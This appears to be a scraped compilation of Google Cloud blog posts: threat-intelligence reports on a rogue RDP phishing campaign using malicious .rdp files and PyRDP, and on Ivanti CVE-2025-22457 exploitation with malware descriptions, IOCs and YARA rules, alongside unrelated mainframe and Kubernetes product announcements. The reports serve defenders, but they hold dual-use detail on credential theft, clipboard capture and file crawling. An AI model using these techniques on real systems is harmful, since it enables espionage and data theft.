Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which could automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the existence, ease of accessibility, and functionalities offered by such a tool make it an attractive option for this campaign. Regardless of whether such a tool was used or not, the tool is bound to the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol, but rather gives enhanced control over the established connection.
The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it tough for incident responders to assess the true impact to victim machines. Further, the number of artifacts left to perform post-mortem are relatively small, compared to other attack vectors. Because existing research on the topic is speculative regarding how much control an attacker has over the victim, we sought to dive deeper into the technical details of the technique components. While full modi operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file stealing.
Deconstructing the Attack: A Deep Dive into RDP Techniques
Remote Desktop Protocol
The RDP is used for communication between the Terminal Server and Terminal Server Client. RDP works with the concept of “virtual channels” that are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface(GUI) access to a machine. However, the protocol supports other interesting capabilities that can facilitate less conventional attack techniques.
RDP Configuration Files
RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect.
The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46
An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings.
When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server.
The remoteapplicationmode parameter being set to 1 will switch the session from the “traditional” interactive GUI session to instead presenting the victim with only a part (application) of the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar for example) is defined by remoteapplicationicon. Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are used as command-line arguments to the application. Due to the use of the property remoteapplicationexpandcmdline:i:0 , the Windows environment variables sent to the RDP server will be that of the client (aka victim), effectively performing initial reconnaissance upon connection.
Lastly, the signature property defines the encoded signature that signs the .rdp file. The signature used in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the domain the RDP connection is made to. For example, with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881.
Figure 4: Signature property within .rdp file
Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4.
Figure 5: .rdp file parsed by rdp_holiday
The certificate is an SSL certificate issued for the domain the RDP connection is made to. This can be correlated with the RDP properties full_address / alternate_full_address.
alternate full address:s:eu-north-1-aws.ua-gov.cloud
full address:s:eu-north-1-aws.ua-gov.cloud
Figure 6: Remote Address RDP Proprties
.rdp files targeting other victims also exhibited similar certificate behavior.
In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to their organization’s certificate authority. Additionally, an organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers.
Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution
The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers.
From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8.
This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:
This RemoteApp being presented resides on the adversary-controlled RDP server, not the client/victim machine.
The Windows environment variables are that of the client/victim that are forwarded to the RDP server as command-line arguments
Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim-user initiating the RDP connection are accessible to the RDP server. The RDP server by default has the ability to read and write to the victim’s file system drives
Victim clipboard data is accessible to the RDP server. If the victim machine is running within a virtualized environment but shares its clipboard with the host machine in addition to the guest, the host’s clipboard will also be forwarded to the RDP server.
Keeping track of what activity happens on the victim and on the server in the case of an attacker-controlled RDP server helps assess the level of control the attacker has over the victim machine. A deeper understanding of the RDP protocol’s functionalities, particularly those related to resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities. This makes understanding the nuances of RDP essential for comprehending PyRDP’s capabilities and potential impact.
More information on RDP parameters can be found here and here.
Resource Redirection
The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.
RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as:
Printers
Keyboards, mouse
Drives (hard drives, CD/DVD drives, etc.)
Serial ports
Hardware keys like Yubico (via smartcard and WebAuthn redirection)
Audio devices
Clipboards (for copy-pasting between local and remote systems)
Resource redirection in RDP is facilitated through Microsoft’s “virtual channels.” The communication happens via special RDP packets, called protocol data packets (PDU), that mirror changes between the victim and attacker machine as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP.
Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams.
Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server
Remote Programs / RemoteApps
RDP has an optional feature called RemoteApp programs, which are applications (RemoteApps) hosted on the remote server that behave like a windowed application on the client system, which in this case is a victim machine. This can make a malicious remote app seem like a local application to the victim machine without ever having to touch the victim machine’s disk.
Figure 10 is an example of the MS Paint application presented as a RemoteApp as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice how there is no banner/top dock that indicates an RDP connection one would expect to see in an interactive session. The only indicator appears to be the RDP symbol on the taskbar.
Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine
All resources used by RemoteApp belong to that of the RDP server. Additionally, if victim drives are mapped to the RDP server, they are accessible by the RemoteApp as well.
PyRDP
While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context.
PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements.
Figure 11: PyRDP as a MiTM tool
PyRDP operates by running on a host (MiTM server) and pointing it to a server running Windows RDP. Victims connect to the MiTM server with no indication of being connected to a relay server, while PyRDP seamlessly relays the connection to the final RDP server while providing enhanced capabilities over the connection, such as:
Stealing NTLM hashes of the credentials used to authenticate to the RDP server
Running commands on the RDP server after the user connects
Capturing the user’s clipboard
Enumerating mapped drives
Stream, record (video format), and session takeover
It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, PyRDP gives granular control to the functionalities native to the RDP protocol.
Password Theft
PyRDP is capable of stealing passwords, regardless of whether Network Level Authentication (NLA) is enabled. In the case NLA is enabled, it will capture the NTLM hash via the NLA as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here.
Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication
Alternatively, if NLA is not enabled, PyRDP attempts to scan the codes it receives when a user tries to authenticate and convert them into virtual key codes, thereby “guessing” the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords.
Figure 13: Plaintext password detection without NLA
When the user authenticates to the RDP server, PyRDP captures these credentials used to login to the RDP server. In the event the RDP server is controlled by the adversary (e.g., in this campaign), this feature does not add much impact since the credentials captured belong to the actor-controlled RDP server. This capability becomes impactful, however, when an attacker attempts an MiTM attack where the end server is not owned by them.
It is worth noting that during setup, PyRDP allows credentials to be supplied by the attacker. These credentials are then used to authenticate to the RDP server. By doing so, the user does not need to be prompted for credentials and is directly presented with the RemoteApp instead. In the campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp seemed to be core to the storyline of the operation, we suspect a tool like PyRDP was used to bypass the user authentication prompt to directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim.
Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session.
Command Execution
PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways:
MS-DOS (cmd.exe)
PowerShell commands
PowerShell scripts hosted on the PyRDP server file system
PyRDP executes the command by freezing/blocking the RDP session for a given amount of time, while the command executes in the background. To the user, it seems like the session froze. At the time of deploying the PyRDP MiTM server, the attacker specifies:
What command to execute (in one of the aforementioned three ways)
How long to block/freeze the user session for
How long the command will take to complete
PyRDP is capable of detecting user connections and disconnections to RDP sessions. However, it lacks the ability to detect user authentication to the RDP server. As a user may connect to an RDP session without immediately proceeding to account login, PyRDP cannot determine authentication status, thus requiring the attacker to estimate a waiting period following user connection (and preceding authentication) before executing commands. It also requires the attacker to define the duration for which the session is to be frozen during command execution, since PyRDP has no way of knowing when the command completes.
The example in Figure 14 relays incoming connections to an RDP server on 192.168.1.2. Upon connection, it then starts the calc.exe process on the RDP server 20 seconds after the user connects and freezes the user session for five seconds while the command executes.
A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though it cannot directly run it on the victim machine. This could facilitate dropping malicious files in locations that allow for further persistent access (e.g., via DLL-sideloading, malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe. We’ll dive deeper into practical detection strategies later in this post.
Clipboard Capture
PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.
Note that if a user connects from a virtual environment (e.g., VMware) and the host machine’s clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.
Scraping/Browsing Client Files
With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system’s file system via the PyRDP-player GUI to download files (see Figure 15).
It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP.
Stream/Capture/Intercept RDP Sessions
PyRDP is capable of recording RDP sessions for later playback. An attacker can optionally stream each intercepted connection and thereafter connect to the stream port to interact with the live RDP connection. The attacker can also take control of the RDP server and perform actions on the target system. When an attacker takes control, the RDP connection hangs for the user, similar to when commands are executed when a user connects.
Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP.
This section focuses on collecting forensic information, hardening systems, and developing detections for RDP techniques used in the campaign.
Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users.
Log Artifacts
Default Windows Machine
During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:
Creation of the following registry key upon connection, which gives insight into attacker server address and username used:
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_IP_Address>
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_server>UsernameHint:
"<username used for connection>"
The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):
Event ID 1102: Logs attacker server IP address
Event ID 1027: Logs attacker server domain name
Event ID 1029: Logs username used to authenticate in format base64(sha256(username)).
Heightened Logging Windows Machine
With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).
Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.
When files are written to the target system using RDP resource redirection, the originating process is observed to be C:Windowssystem32mstsc.exe. A retrospective analysis of a large set of representative data consisting of enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence but display a pattern that could be excluded from alerting.
For example, multiple arbitrarily named terminal server-themed .tmp files following the regex pattern _TS[A-Z0-9]{4}.tmp(e.g., _TS4F12.tmp) are written to the user’s %APPDATA%/Local/Temp directory throughout the duration of the connection.
Additionally, several file writes and folder creations related to the protocol occur in the %APPDATA%/LocalMicrosoftTerminal Server Client directory.
Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives.
Should file read activity be enabled, mstsc.exe-originating file reads could warrant suspicion. It is worth noting that file-read events by nature are noisy due to the way the Windows subsystem operates. Caution should be taken before enabling it.
.rdp File via Email
The .rdp configuration file within the campaign was observed being sent as an email attachment. While it’s not uncommon for IT administrators to send .rdp files over email, the presence of an external address in the attachment may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can indicate .rdp files being run directly from Outlook email attachments:
/\AppData\Local\Microsoft\Windows\(INetCache|Temporary Internet Files)
\Content.Outlook\[A-Z0-9]{8}\[^\]{1,255}.rdp$/
/\AppData\Local\Packages\Microsoft.Outlook_[a-zA-Z0-9]{1,50}\.{0,120}
\[^\]{1,80}.rdp$/
/\AppData\Local\Microsoft\Olk\Attachments\([^\]{1,50}\){0,5}[^\]
{1,80}.rdp$/
System Hardening
The following options could assist with hardening enterprise environments against RDP attack techniques.
Network-level blocking of outgoing RDP traffic to public IP addresses
Disable resource redirection via the Registry
Key: HKEY_LOCAL_MACHINESoftwareMicrosoftTerminal Server Client
Allow .rdp files from unknown publishers: Setting this to disable will not allow users to run unsigned .rdp files as well as ones from untrusted publishers.
Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers
Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: Policies on enable/disabling
Resource redirection
Clipboard redirection
Forcing Network Level Authentication
Time limits for active/idle connections
Blocking .rdp file extension as email attachments
The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior.
YARA Rules
These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps.
This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor could effectively leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, proving that the true danger of Rogue RDP lies not in the code, but in the con.
In this particular campaign, while control over the target system seems limited, the main capabilities revolve around file stealing, clipboard data capture, and access to environment variables. It is more likely this campaign was aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red teaming tools intended for education purposes are weaponized by malicious actors with harmful intentions.
Acknowledgments
Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.
Modernizing mainframes has been a long and expensive process for too long. Today, we’re launching new solutions that bring the combined strength of Gemini models, and our partners’ technologies and services to accelerate mainframe modernization.
Google Cloud generative AI products for mainframe modernization
Google Cloud currently offers three products for mainframe customers looking to reimagine their mainframe applications (significantly change the code logic and design), focusing on assessment, code transformation and testing.
1. Google Cloud Mainframe Assessment Tool (powered by Gemini Models) Google Cloud’s Mainframe Assessment Tool (MAT), now generally available, allows customers to thoroughly assess and analyze their entire mainframe estate, including applications and data, enabling informed decisions on the optimal modernization path. MAT provides in-depth code analysis, generates clear code explanations, summarized application logic and specifications, automated documentation creation, identification of application dependencies, and the generation of initial test cases. This accelerates understanding of the mainframe code and jumpstarts the modernization process. Learn more.
2. Google Cloud Mainframe Rewrite (powered by Gemini Models) To modernize your mainframe applications, Google Cloud’s Mainframe Rewrite, now available in Preview, helps developers transform and reimagine legacy mainframe code into modern languages, such as Java and C#. Mainframe Rewrite provides an IDE environment for developers to iteratively modernize legacy code, test and deploy the modernized application in Google Cloud. Learn more.
3. Dual Run To de-risk the modernization journey, customers can use Google Cloud Dual Run to thoroughly test, certify, and validate the modernized mainframe applications. Dual Run allows users to verify the correctness, completeness, and performance of the modernized code during migration and before the new application goes live in production.
By replaying live events from the production mainframe onto the modernized cloud application, Dual Run compares the output between the two systems to detect any differences. Learn more.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7fc09a0430>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Now you can use our partners’ technology, too
For customers who want to take a more interactive and incremental approach to mainframe modernization, our partner Mechanical Orchard offers a platform that rapidly rewrites mainframe applications into idiomatic modern languages without changing the logic. Once this is achieved, the modern code lends itself to more rapid transformation. This kind of gradual transformation is also the foundation of the AI-accelerated Mainframe Modernization collaboration between global consultancy Thoughtworks and Mechanical Orchard.
The Mechanical Orchard’s modernization platform combines data capture agents with a highly disciplined methodology to modernize legacy systems incrementally and non-disruptively. It reconstructs system behavior from real data flows, rewriting components piece by piece using generative AI into modern, idiomatic, and deterministic code. By shifting integration and testing earlier, it also reduces risk, and ensures old and new code are functionality equivalent by refining itself until it matches the legacy system’s output. Workloads are migrated individually to the cloud production environment. This approach reduces project risk and disruption and can provide faster time to value.
The primary goal is to create a functional equivalent of the legacy system, ensuring that the new code produces identical outputs for every input. Mechanical Orchard supports COBOL-era systems and can generate code in languages like Java, Python, and others.
Google’s leading delivery partners go further to accelerate and de-risk modernization
Our new Mainframe Modernization with Gen AI Acceleratorprogram adds another vital ingredient – the strong experience and capable teams of our expert delivery partners who will bring the above tools to life for customers. We are thrilled to welcome Accenture, EPAMandThoughtworks to the program. They bring rich and practical experience in how to best use these AI-powered solutions to maximize modernization. Their experience in establishing modern engineering practices and providing comprehensive enablement for customer teams will empower organizations to fully embrace their cloud-native future and achieve lasting success.
The program has three phases:
Highly detailed assessment: This phase analyzes the environment using theGoogle Mainframe Assessment Tool (MAT) enhanced with Gemini models and combined with the partners expertise. From this detailed assessment, customers will receive detailed documentation about their mainframe applications (knowledge base and explainability of the mainframe applications), modernization recommendations, and a modernization plan with estimated timelines, resources, and specific approaches.
Proof of value stage
Executing the modernization at scale
For a limited time, qualified customers can access this assessment (typically done in four to eight weeks) conducted by select partners at no-cost (excluding underlying Google Cloud infrastructure usage).
Put us to the test
Google Cloud and partners are ready to apply generative AI to one of the most important modernization challenges. Let’s start with an assessment. For more details and inquiries please write to mainframe@google.com.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie
On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible.
The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported SPAWN ecosystem of malware attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023.
A patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered through a complicated process, it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution.
Ivanti released patches for the exploited vulnerability and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Post-Exploitation TTPs
Following successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the SPAWN ecosystem of malware, as well as a modified version of the Integrity Checker Tool (ICT) as a means of evading detection.
Shell-script Dropper
Following successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running /home/bin/web process. The first stage begins by searching for a /home/bin/web process that is a child process of another /home/bin/web process (the point of this appears to be to inject into the web process that is actually listening for connections). It then creates the the following files and associated content:
/tmp/.p: contains the PID of the /home/bin/web process.
/tmp/.m: contains a memory map of that process (human-readable).
/tmp/.w: contains the base address of the web binary from that process
/tmp/.s: contains the base address of libssl.so from that process
/tmp/.r: contains the BRUSHFIRE passive backdoor
/tmp/.i: contains the TRAILBLAZE dropper
The shell script then executes /tmp/.i, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for /tmp/.p), as well as the contents of the /data/var/cores directory. Next, all child processes of the /home/bin/web process are killed and the /tmp/.p file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted.
TRAILBLAZE
TRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified /home/bin/web process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process.
BRUSHFIRE
BRUSHFIRE is a passive backdoor written in bare C that acts as an SSL_read hook. It first executes the original SSL_read function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call SSL_write to send the value back.
SPAWNSLOTH
As detailed in our previous blog post, SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the dslogserver process to disable both local logging and remote syslog forwarding.
SPAWNSNARE
SPAWNSNARE is a utility that is written in C and targets Linux. It can be used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools.
SPAWNWAVE
SPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the SPAWN* malware ecosystem. SPAWNWAVE overlaps with the publicly reported SPAWNCHIMERA and RESURGE malware families.
Attribution
Google Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation CVE-2023-46805 and CVE-2024-21887.
Furthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances.
GTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations.
Conclusion
This latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure.
Recommendations
Mandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance.
Acknowledgements
We would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE, we would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support.
Indicators of Compromise
To assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.
Code Family
MD5
Filename
Description
TRAILBLAZE
4628a501088c31f53b5c9ddf6788e835
/tmp/.i
In-memory dropper
BRUSHFIRE
e5192258c27e712c7acf80303e68980b
/tmp/.r
Passive backdoor
SPAWNSNARE
6e01ef1367ea81994578526b3bd331d6
/bin/dsmain
Kernel extractor & encryptor
SPAWNWAVE
ce2b6a554ae46b5eb7d79ca5e7f440da
/lib/libdsupgrade.so
Implant utility
SPAWNSLOTH
10659b392e7f5b30b375b94cae4fdca0
/tmp/.liblogblock.so
Log tampering utility
YARA Rules
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_Utility_SPAWNSNARE_1 {
meta:
author = "Mandiant"
description = "SPAWNSNARE is a utility written in C that targets
Linux systems by extracting the uncompressed Linux kernel image
into a file and encrypting it with AES."
strings:
$s1 = "x00extract_vmlinuxx00"
$s2 = "x00encrypt_filex00"
$s3 = "x00decrypt_filex00"
$s4 = "x00lbb_mainx00"
$s5 = "x00busyboxx00"
$s6 = "x00/etc/busybox.confx00"
condition:
uint32(0) == 0x464c457f
and all of them
}
rule M_APT_Utility_SPAWNSLOTH_2
{
meta:
author = "Mandiant"
description = "Hunting rule to identify strings found in SPAWNSLOTH"
strings:
$dslog = "dslogserver" ascii fullword
$hook1 = "g_do_syslog_servers_exist" ascii fullword
$hook2 = "ZN5DSLog4File3addEPKci" ascii fullword
$hook3 = "funchook" ascii fullword
condition:
uint32(0) == 0x464c457f and all of them
}
Over the past ten years, Kubernetes has become the leading platform for deploying cloud-native applications and microservices, backed by an extensive community and boasting a comprehensive feature set for managing distributed systems. Today, we are excited to share that Kubernetes is now unlocking new possibilities for generative AI inference.
In partnership with Red Hat and ByteDance, we are introducing new capabilities that optimize load balancing, scaling and model server performance on Kubernetes clusters running large language model (LLMs) inference. These capabilities build on the success of LeaderWorkerSet (LWS), which enables multi-host inference for state-of-the-art models (including ones with 671B parameters), and push the envelope on what’s possible for gen AI Inference on Kubernetes.
First, the new Gateway API Inference Extension now supports LLM-aware routing, rather than traditional round robin. This makes it more cost-effective to operationalize popular Parameter-Efficient Fine-Tuning (PEFT) techniques such as Low-Rank Adaptation (LoRA) at scale, by using a base model and dynamically loading fine-tuned models (‘adapters’) based on user need. To support PEFT natively, we also introduced new APIs, namely InferencePool and InferenceModel.
Second, a new inference performance project provides a benchmarking standard for detailed model performance insights on accelerators and HPA scaling metrics and thresholds. With the growth of gen AI inference on Kubernetes, it’s important to be able to measure the performance of serving workloads alongside the performance of model servers, accelerators, and Kubernetes orchestration.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec2e20df5e0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Third, Dynamic Resource Allocation, developed with Intel and others, simplifies and automates how Kubernetes allocates and schedules GPUs, TPUs, and other devices to pods and workloads. When used along with the vLLM inference and serving engine, the community benefits from scheduling efficiency and portability across accelerators.
“Large-scale inference with scalability and flexibility remains a challenge on Kubernetes. We are excited to collaborate with Google and the community on the Gateway API Inference Extension project to extract common infrastructure layers, creating a more unified and efficient routing system for AI serving — enhancing both AIBrix and the broader AI ecosystem.” – Jiaxin Shan, Staff Engineer at Bytedance, and Founder at AIBrix
“We’ve been collaborating with Google on various initiatives in the Kubernetes Serving working group, including a shared benchmarking tool for gen AI inference workloads. Working with Google, we hope to contribute to a common standard for developers to compare single-node inference performance and scale out to the multi-node architectures that Kubernetes brings to the table.” – Yuan Tang, Senior Principal Software Engineer, Red Hat
“We are partnering with Google to improve vLLM for operationalizing deployments of open-source LLMs for enterprise, including capabilities like LoRA support and Prometheus metrics that enable customers to benefit across the full stack right from vLLM to Kubernetes primitives such as Gateway. This deep partnership across the stack ensures customers get production ready architectures to deploy at scale” – Robert Shaw, vLLM Core Committer and Senior Director of Engineering Neural Magic (acquired by Red Hat)
